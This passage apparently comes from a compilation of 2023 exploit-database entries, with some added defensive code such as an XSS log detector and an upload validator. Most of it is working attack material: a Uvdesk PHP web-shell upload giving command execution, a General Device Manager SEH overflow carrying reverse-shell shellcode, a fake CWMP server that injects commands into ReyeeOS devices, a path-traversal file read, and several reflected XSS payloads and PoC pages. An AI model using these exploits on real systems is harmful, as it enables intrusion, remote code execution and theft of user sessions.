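    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and PROBE_RE.search(unquote(m.group(1))):
            hits.append(m.group(1))
    return hits


SAMPLE_LOG = [  # constructed, common log format
    '203.0.113.5 - - [24/Jul/2023:10:01:02 +0000] "GET /index.php?option=com_hikashop&ctrl=product&from_option=com_hikashop HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Jul/2023:10:01:07 +0000] "GET /product-variants?keyword=uk9ni%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea6di2&view=category HTTP/1.1" 200 734',
    '198.51.100.2 - - [24/Jul/2023:10:02:11 +0000] "GET /users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity HTTP/1.1" 404 231',
    '198.51.100.7 - - [24/Jul/2023:10:03:40 +0000] "GET /friends/ajax_invite?mode=model HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    print(render_text(PROBE_IMG))
    print(render_attr(PROBE_ATTR))
    print(render_href("javascript:alert(1)"))
    for hit in flag_reflected_xss(SAMPLE_LOG):
        print("probe:", hit)
```

Note that `html.escape` is the right tool for text and quoted-attribute contexts only; an unquoted attribute, a `<script>` block or a URL each need their own rules, which is why `render_href` allowlists the scheme rather than relying on escaping. The detector decodes the target once before matching, since the probes arrive percent-encoded and a raw-string match on `<img` would miss them.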
-
Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6

import requests
import argparse


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args


def main():
    args = get_args()
    base_url = args.url
    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

    # Edit your credentials here
    login_data = {
        "_username": "[email protected]",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.session()

    # Login
    s.post(base_url + "/en/member/login", data=login_data)

    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)

    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)


if __name__ == "__main__":
    main()
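Three upload bugs on this page share one fix: validate what an uploaded file actually is before storing it. Perch and October CMS accept an SVG that carries a `<script>` element and then serve it inline; Uvdesk accepts a `.php` file because the request merely declares it to be `image/jpg`. The block below is an added example, not code from any of the three projects. It allowlists the extension and declared type, sniffs the real content, parses an SVG and rejects active content (script or foreignObject elements, `on*` handlers, `javascript:` URLs), and refuses a file whose bytes do not match what its name claims. The `validate_upload` name and all sample files are constructed.

```python
"""Upload validation: magic-byte sniffing, extension/type allowlist, and an
SVG active-content check (added example; constructed sample files)."""
import re
import xml.etree.ElementTree as ET

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "svg"}
ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif", "image/svg+xml"}
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff(data: bytes):
    """Return the image kind implied by the bytes themselves, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    head = data.lstrip()[:512].lower()
    if head.startswith(b"<?xml") or head.startswith(b"<svg"):
        return "svg"  # provisional: svg_is_active() decides whether it is acceptable
    return None


def svg_is_active(data: bytes) -> bool:
    """True if the SVG carries script or event-handler content (or is unparsable)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True  # refuse what we cannot parse rather than guess
    for el in root.iter():
        tag = el.tag.lower() if isinstance(el.tag, str) else ""
        if tag.endswith("script") or tag.endswith("foreignobject"):
            return True
        for name, value in el.attrib.items():
            if name.lower().startswith("on"):
                return True
            if re.match(r"\s*javascript:", value, re.I):
                return True
    return False


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (ok, reason); ok=False means reject the upload outright."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if declared_type not in ALLOWED_TYPES:
        return False, "declared type not allowed"
    kind = sniff(data)
    if kind is None:
        return False, "content is not a recognised image"
    expected = "jpg" if ext == "jpeg" else ext
    if kind != expected:
        return False, "content does not match extension"
    if kind == "svg" and svg_is_active(data):
        return False, "svg contains active content"
    return True, "ok"


# Constructed sample files.
SVG_SCRIPT = (
    b'<?xml version="1.0" standalone="no"?>\n'
    b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n'
    b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">\n'
    b'  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>\n'
    b'  <script type="text/javascript">alert(1);</script>\n'
    b'</svg>\n')
SVG_HANDLER = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" onload="alert(1)"/></svg>'
SVG_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10" fill="#009900"/></svg>'
PHP_AS_IMAGE = b"<?php echo 'constructed'; ?>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # header only; enough for the magic check

if __name__ == "__main__":
    for name, ctype, blob in [("xss.svg", "image/svg+xml", SVG_SCRIPT),
                              ("logo.svg", "image/svg+xml", SVG_CLEAN),
                              ("shell.php", "image/jpg", PHP_AS_IMAGE),
                              ("shell.jpg", "image/jpeg", PHP_AS_IMAGE),
                              ("pic.png", "image/png", PNG_STUB)]:
        print(name, validate_upload(name, ctype, blob))
```

Validation is necessary but not sufficient on its own: an SVG that passes should still be served with `Content-Disposition: attachment` or a restrictive `Content-Security-Policy` rather than rendered inline from the application's origin, and the upload directory must be configured so that the web server never executes anything stored there, which is what turns the Uvdesk upload from a stored file into code execution.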
-
General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90"  # jmp short
seh = struct.pack('<I', 0x10081827)  # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
nops = b"\x90" * 32

# shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
shellcode = b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"

final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." % len(final_payload))
        f.write(final_payload)
        f.close()
    print("[+] File created!")
except:
    print("File cannot be created!")
-
ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
# Google Dork: None
# Date: July 31, 2023
# Exploit Author: Riyan Firmansyah of Seclab
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE : None

"""
Summary
=======

The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the IP address input form is not validated properly and allows the user to perform OS command injection.

On the other side, a Ruijie Reyee Cloud based device makes polling requests to the Ruijie Reyee CWMP server to ask whether there is any command from the web controller that needs to be executed. After analysing the network capture that comes from the device, the connection for polling requests to the Ruijie Reyee CWMP server is an unencrypted HTTP request.

Because of the unencrypted HTTP request that comes from the Ruijie Reyee Cloud based device, an attacker could set up a fake server using a Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that makes CWMP requests to the fake server. Once the attacker has gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
"""

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from html import escape, unescape
import http.server
import socketserver
import io
import time
import re
import argparse
import gzip

# command payload
command = "uname -a"

# change this to serve on a different port
PORT = 8080


def cwmp_inform(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
    serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
    parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
    for parameter in parameters:
        parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
        parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
        result['parameters'][parameter_name] = parameter_value
    return result


def cwmp_inform_response():
    return """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""


def command_payload(command):
    current_time = time.time()
    result = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
    return result


def command_response(soap):
    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
    command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
    response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
    result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
    return result


class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    protocol_version = 'HTTP/1.1'

    def do_GET(self):
        self.send_response(204)
        self.end_headers()

    def do_POST(self):
        print("[*] Got hit by", self.client_address)
        f = io.BytesIO()
        if 'service' in self.path:
            stage, info = self.parse_stage()
            if stage == "cwmp_inform":
                self.send_response(200)
                print("[!] Got Device information", self.client_address)
                print("[*] Product Class:", info['product_class'])
                print("[*] Serial Number:", info['serial_number'])
                print("[*] MAC Address:", info['parameters']['mac'])
                print("[*] STUN Client IP:", info['parameters']['stunclientip'])
                payload = bytes(cwmp_inform_response(), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            elif stage == "command_request":
                self.send_response(200)
                self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
                print("[*] Device interacting", self.client_address)
                print(info)
                payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
                f.write(payload)
                self.send_header("Content-Length", str(f.tell()))
            else:
                print("[*] Command response", self.client_address)
                print(unescape(info['response']))
                self.send_response(204)
                f.write(b"")
        else:
            print("[x] Received invalid request", self.client_address)
            self.send_response(204)
            f.write(b"")

        f.seek(0)
        self.send_header("Connection", "keep-alive")
        self.send_header("Content-type", "text/xml;charset=utf-8")
        self.end_headers()
        if f:
            self.copyfile(f, self.wfile)
            f.close()

    def parse_stage(self):
        content_length = int(self.headers['Content-Length'])
        post_data = gzip.decompress(self.rfile.read(content_length))
        if "cwmp:Inform" in post_data.decode("utf-8"):
            return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
        elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
            return ("command_response", command_response(post_data.decode("utf-8")))
        else:
            return ("command_request", "Ping!")

    def log_message(self, format, *args):
        return


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
                        help='Specify alternate bind address '
                             '[default: all interfaces]')
    parser.add_argument('port', action='store', default=PORT, type=int,
                        nargs='?',
                        help='Specify alternate port [default:
{}]'.format(PORT)) args = parser.parse_args() Handler = CustomHTTPRequestHandler with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: ip_addr = args.bind if args.bind != '' else '0.0.0.0' print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() """ Output ====== ubuntu:~$ python3 exploit.py [!] serving fake CWMP server at 0.0.0.0:8080 [*] Got hit by ('[redacted]', [redacted]) [!] Got Device information ('[redacted]', [redacted]) [*] Product Class: EW1200G-PRO [*] Serial Number: [redacted] [*] MAC Address: [redacted] [*] STUN Client IP: [redacted]:[redacted] [*] Got hit by ('[redacted]', [redacted]) [*] Device interacting ('[redacted]', [redacted]) Ping! [*] Got hit by ('[redacted]', [redacted]) [*] Command response ('[redacted]', [redacted]) PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms --- 127.0.0.1 ping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.300/0.335/0.400 ms Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux """
-
WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS
# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979

from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep

# Values:
url = argv[-1]
if url[-1] == "/":
    url = url.rstrip("/")

# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"

# HTML template (an f-string, so literal CSS braces are doubled)
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
    <title>{CVE_NAME}</title>
    <style>
        body {{
            font-family: Arial, sans-serif;
            background-color: #f7f7f7;
            color: #333;
            margin: 0;
            padding: 0;
        }}
        header {{
            background-color: #4CAF50;
            padding: 10px;
            text-align: center;
            color: white;
            font-size: 24px;
        }}
        .cool-button {{
            background-color: #007bff;
            color: white;
            padding: 10px 20px;
            border: none;
            cursor: pointer;
            font-size: 16px;
            border-radius: 4px;
        }}
        .cool-button:hover {{
            background-color: #0056b3;
        }}
    </style>
</head>
<body>
    <header>
        Ninja-forms reflected XSS ({CVE_NAME})<br>
        Created by Mehran Seifalinia
    </header>
    <div style="padding: 20px;">
        <form action="{url}/wp-admin/admin-ajax.php" method="POST">
            <input type="hidden" name="action" value="nf_batch_process" />
            <input type="hidden" name="batch_type" value="import_form_template" />
            <input type="hidden" name="security" value="e29f2d8dca" />
            <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />
            <input type="hidden" name="method_override" value="_respond" />
            <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />
            <input type="submit" class="cool-button" value="Click here to Execute XSS" />
        </form>
    </div>
    <div style="background-color:red;color:white;padding:1%;">After clicking the button, if you receive a 0 or an empty page in the browser, you need to log in first.</div>
    <footer>
        <a href="https://github.com/Mehran-Seifalinia">Github</a><br>
        <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a>
    </footer>
</body>
</html>
"""


# Write the PoC page to the current directory and open it in the default browser
def exploit():
    with open(f"{CVE_NAME}.html", "w") as poc:
        poc.write(HTML_TEMPLATE)
    print(f"[@] POC Generated at {getcwd()}\\{CVE_NAME}.html")
    print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
    sleep(2)
    webbrowser.open(f"{getcwd()}\\{CVE_NAME}.html")


# Check if the vulnerable version is installed (reads "Stable tag:" from readme.txt)
def check_CVE():
    try:
        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
        if response.status_code != 200 or not ("Ninja Forms" in response.text):
            print("[!] Ninja-forms plugin is not installed on this site.")
            return False
        else:
            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
            main_version = int(version.split(".")[0])
            partial_version = int(version.split(".")[1])
            final_version = int(version.split(".")[2])
            if (main_version < 3) or (main_version == 3 and partial_version < 6) or \
               (main_version == 3 and partial_version == 6 and final_version <= 25):
                print(f"[*] Vulnerable Ninja-forms version {version} detected!")
                return True
            else:
                print(f"[!] Ninja-forms version {version} is not vulnerable!")
                return False
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()


# Check syntax of the script
def check_script():
    usage = f"""
Usage: {argv[0].split("/")[-1]} [OPTIONS] [TARGET]

OPTIONS:
    --exploit: Open a browser and execute the vulnerability.

TARGET:
    A URL starting with 'http://' or 'https://'

Examples:
    > {argv[0].split("/")[-1]} https://vulnsite.com
    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
"""
    try:
        if len(argv) < 2 or len(argv) > 3:
            print("[!] Syntax error...")
            print(usage)
            exit()
        elif not url.startswith(tuple(["http://", "https://"])):
            print("[!] Invalid target...\n\tTarget must start with 'http://' or 'https://'")
            exit()
        else:
            for arg in argv:
                if arg == argv[0]:
                    print("[*] Starting the script >>>")
                    state = check_CVE()
                    if state == False:
                        exit()
                elif arg.lower() == "--exploit":
                    exploit()
                elif arg == url:
                    continue
                else:
                    print(f"[!] What the heck is '{arg}' in the command?")
    except Exception as error:
        print(f"[!] Error: {error}")
        exit()


if __name__ == "__main__":
    check_script()
-
Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation methods. If LogAnalyzer was installed without a database (file-based), no login is needed. If it was installed with a database, you need to log in as at least a read-only user.

XSS payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
-
Joomla JLex Review 6.0.1 - Reflected XSS
# Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 01/08/2023
# Vendor: JLexArt
# Vendor Homepage: https://jlexart.com/
# Software Link: https://extensions.joomla.org/extension/jlex-review/
# Demo: https://jlexreview.jlexart.com/
# Version: 6.0.1
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /

URL parameter is vulnerable to XSS

https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1

XSS Payloads:

itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
-
Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link: https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10

##################################### Arbitrary File Read PoC #####################################

curl https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC #####################################
-
JLex GuestBook 1.6.4 - Reflected XSS
# Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 01/08/2023
# Vendor: JLexArt
# Vendor Homepage: https://jlexart.com/
# Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/
# Demo: https://jlexguestbook.jlexart.com/
# Version: 1.6.4
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /u/perry-705

GET parameter 'q' is vulnerable to XSS

http://website/u/perry-705?q=[XSS]&wl=1

XSS Payloads:

db8ck"onfocus="confirm(1)"autofocus="xwu0k
-
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS
# Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/shuttle-booking-software/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4112

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

URL parameter is vulnerable to RXSS

https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
-
PHPJabbers Service Booking Script 1.0 - Reflected XSS
# Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 21/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/service-booking-script/
# Version: 1.0
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4113

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

An attacker can send the victim a link containing a malicious URL in an email or instant message and perform a wide variety of actions, such as stealing the victim's session token or login credentials.

Path: /index.php

GET parameter 'index' is vulnerable to RXSS

https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
-
PHPJabbers Cleaning Business 1.0 - Reflected XSS
# Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 21/07/2023
